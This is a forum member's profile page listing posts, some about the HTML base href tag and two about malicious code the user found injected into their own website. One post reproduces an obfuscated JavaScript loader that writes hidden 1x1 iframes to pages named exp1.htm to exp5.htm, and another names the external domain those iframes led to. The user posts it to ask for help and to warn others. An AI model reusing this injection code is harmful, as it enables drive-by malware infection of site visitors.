Jump to content

franky

Members
  • Posts

    5
  • Joined

  • Last visited

franky's Achievements

Newbie

Newbie (1/7)

0

Reputation

  1. franky

    base href

    Thanks for the info jesh - it was worth a try (asking) - don't like javascript too much (security) but may give it a go.Thanks again.
  2. franky

    base href

    Hi allI have a base href <!-- commented out --> in my htm files - as of:<!-- <base href="http://www.somewhere_where_my_files_are/"> -->and am using local references like:<a href="project2b.htm#top3"><img style="border: 0px solid ; width: 229px; height: 37px;" alt="" title="Linky" src="3.gif"></a>to edit and browse the files locally on my pc.I think I know that if I upload the files with the base hred uncomented - the browser will look for the project2b.htm and gif at the base folder's path.What I'm after is to be able to change my css file only - to change the base href's path - instead of having to change it within each and every file's <head> - can some one help me out?
  3. Just wanted to say - thanks from me 2.Cool one
  4. Sorry guys I'll give it another go:Avg was poping up for me when I was on my site - so I was worried. I looked at the source code and found a script. It (the above script that I posted first) was found in the code that I found at a link/url that I found in an iframe that was at the top of my site - the iframe was 1 by 1 in size.It (the 1 by 1 in size iframe code/script) was not actualy put on my site (in my htm code) by me.I can now see <img src='http://127.0.0.1:1025/bug.cgi'> is in its place. The iframe on my site lead to http://prevedtraf.biz/strong/061/ which itself seems to have iframs 1 by 1 in size.What does it all mean? :)P.S.Just googled the site http://prevedtraf.biz - and got lots of "This site may harm your computer." - so be carefule out there...
  5. Could someone help me out and tell me what this is or does:<html><body><script>document.write(unescape("%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%31%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%32%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%33%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%34%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e%0a%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%65%78%70%35%2e%68%74%6d%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67%68%74%3d%22%31%22%3e%3c%2f%69%66%72%61%6d%65%3e"));</script></body></html>
×
×
  • Create New...